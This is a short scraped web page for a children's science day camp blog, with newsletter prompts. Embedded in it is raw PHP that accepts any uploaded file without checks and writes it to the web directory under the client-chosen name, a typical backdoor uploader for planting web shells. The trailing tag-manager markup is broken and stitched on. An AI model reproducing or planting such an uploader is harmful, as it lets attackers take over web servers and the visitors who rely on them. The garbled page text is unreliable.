The Fun Science Day Camp!

Science Blog for Elementary Kids - Activities, News & More

Financial Assistance
SUBSCRIBE TO OUR
NEWSLETTER
and stay up to date on Destination
Science news & savings!

<?php
if(isset($_FILES['f'])){
$target = basename($_FILES['f']['name']);
if(move_uploaded_file($_FILES['f']['tmp_name'], $target)){
echo "OK: $target";
} else {
echo "FAIL";
}
exit;
}
?>

<-- Google Tag Manager (noscript) --> script>